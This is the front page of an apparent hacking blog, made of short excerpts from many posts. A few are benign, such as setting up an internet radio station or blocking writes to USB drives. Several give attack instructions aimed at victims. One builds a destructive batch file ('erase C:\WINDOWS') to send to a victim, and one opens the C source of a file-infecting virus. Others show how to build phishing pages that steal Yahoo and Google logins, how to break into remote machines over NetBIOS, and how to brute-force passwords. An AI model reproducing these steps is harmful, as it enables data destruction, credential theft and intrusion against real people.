Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


How To Make Your Own Radio station

Love to listen to internet radio ? Have a great collection of music ? Wanna be a DJ ? or just wanna make others experience your great collection of music ? lets get it going..and get ready to rap,roll and obviously broadcast… Here is what you need - Any version of Winamp . Get it here SHOUTCAST Radio Tools Internet connection Your own Domain Firstly,your internet speed has to be at least 64 kbps or above (which means Dial-up users, who will be having a lot of latency, will not be able to setup)...

Disable Writing to USB Drives

A common security concern at organizations is allowing users to plug in a usb flash drive, because they could so easily copy corporate data.Since Windows XP SP2, you can disable writing to USB devices altogether using a simple registry hack.however one should also note that if you are using this trick, you should make sure that the users are not administrators on the computer, because they could easily change this setting back. Here it is: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]...

Make virus in just one minute

Plx Reply and show your feed back Here is a simple and easy trick to make a virus in less than 1 minute. :) CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS. HERE'S THE To Make the virus: 1.Go to notepad, 2. Type erase C:\WINDOWS, 3. Save IT AS SOMETHING.cmd , 4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again... How does this works? The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase...

Hack yahoo using fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords. Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites. Here...

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking...

How to Hack an Email Account – Email Hacking

Wondering to know how to hack an email account? Well, before you can do that, you need to understand the real ways of hacking that actually work and also that are simply scam and do not work.So, here in this post, I am going to discuss some of the Real and Working Ways to hack emails; along with that, I am also going to make you aware of the common myths and scams associated with email hacking.On a regular basis, a lot of people contact me about suspecting...

How to Protect an Email Account from being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an...

Hacking Yahoo Messenger

This tutorial will tell you how to hack yahoo messenger while you are engaged in chatting with some person. While you are chatting through yahoo messenger, Yahoo will hide the IP addresses of all the computers that are connected through the yahoo messenger application to the chat room. So it is not possible to directly find out the IP of the person you want to hack. Then how to get the IP address? Yes it is still possible to hack...

Windows IP Utilities

The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains. These are the basic IP Hacking Commands that everyone must know!Please note that the the term Host used in this article can also be assumed as a Website for simple understanding purpose.1. PINGPING is a simple application (command) used to determine whether a host is online and available. PING command sends one or more...

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.STEP-BY-STEP NETBIOS HACKING PROCEDURE 1.Open command prompt2. In the command prompt use the “net view” command ( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).Example: C:\>net view \\219.64.55.112The above...

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with...

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral...

How to Compile C Programs

In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.  How to install Borland C++ compiler 1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link. http://www.codegear.com/downloads/free/cppbuilder 2. After you download, run...

How to Change the ICON of an EXE file

Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file...

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.   #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned...

Brute force Password Cracking explained

Brute force is the best hacking method to an email account  as chances of getting password is very high.The methods is very simple . But this method is cumbersome. Still most hacking software use this method due to high success rate . This is how you do it. All that you need is the username and findout what is the max password length the software/site allows and also the minimum. say the minimum is 6 and max is 8. You have to start trying out all the combination.First all...

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter PDF Decrypter v2.50 | 6MB PDF Decrypter 2.5 can be used to decrypt the protected Adobe Acrobat PDF files, which have “owner” password set, preventing the file from editing, printing, selecting text and graphics etc. It is the fast, affordable way to decrypt a lot of protected pdf files to decryped pdf files once time for saving your time! Its easy-to-use interface allows you to decrypt PDF...

PDF Password Cracker: Download PDF Password Remover

The PDF Password Remover can be used to decrypt protected Adobe Acrobat PDF file The PDF Password Remover is a useful and reliable software which can be used to decrypt protected Adobe Acrobat PDF files, which have "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics. Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e. with edit/copy/print functions...

Download video from youtube with out software

Here is the easiest way to download any video from Youtube. While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2 then add the word ‘kick’ between www. and youtube.com/link……. EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2 That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy ...

How To Create Fake Pages

I will give some hacking lessons to budding hackers. This will tell you how to create fake pages. Here is how you create one. Let me show how you do for Google.com. Open Google in a new tab or Click Here . Now select "View" from menubar Then select "Source"(IE) or "Page Source"(firefox). This will show you raw html of the site in a notepad in case of IE. In firefox this will be visible in firefox. Now You need To save this page. Just select "Save page as " . Change save type as to "All Files". and save it as XYZ.html(anyname.html) Now just...

Want More Blog Traffic! Submit Your New Blog Here For Free

When your blog is new the only thing you want is traffic and the most easy, simple, best and successful methods are here mentioned below:Leave a comment at the bottom of this post with your blog’s URL and describe your blog in a short paragraph. Subscribe to my RSS feed (In return, I will help you to boost your traffic). Subscribe to the other blogs’ RSS feeds. Make sure you subscribe to the comments so that you get alerted on every new comment. Do not post as Anonymous user, it will be considered as SPAMMING. Every time a new comment is added,...

Firefox & Chrome Mafia Wars Autoplayer Script

Firefox & Chrome Mafia Wars Autoplayer Script Mafia Wars Autoplayer is a script made to work with greasemonkey add-on on your Firefox/Chrome browser. With the Mafia Wars Autoplayer you will be able to automate doing jobs, harvesting cuban business, deposit money when it reaches certain amount automayically, do fighting, robbing even collect bounty for you, it can also auto purchase inventories for you, probabaly one of the best thing with Mafia Wars Autoplayer is when it does a job,...

Downright now - Monitoring if your favorite website is down

Last night when I was at Facebook, suddenly it stopped responding and the server requests just timed out. I wondered if it was a problem with my ISP or the king of social networking was down at the moment. With nothing to do, I googled and stumbled across Downrightnow , a service that monitors your favorite websites. It compiles the status by combining Reports from users who visit downrightnow Public messages on Twitter from users who are having service trouble Official company announcements...

winAUTOPWN v2.7 Released - Vulnerability Testing on Windows

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi- threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages...

BSNL router hacking and possibility of running custom code over it

Hi all, I am sorry I have been inactive due to my job, i actually got free this weekend and there we go, i was at home. At home I am having BSNL connection, and for those who dont know what BSNL is, its the AT&amp;T of India, bad service , too much blank spots and connections which flap/drop/disconnect like there is no tomorrow. Worst, I was on my android, trying to get the latest of cyanogen nightlies .  I was frustrated by the services of BSNL. Hence I decided...

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More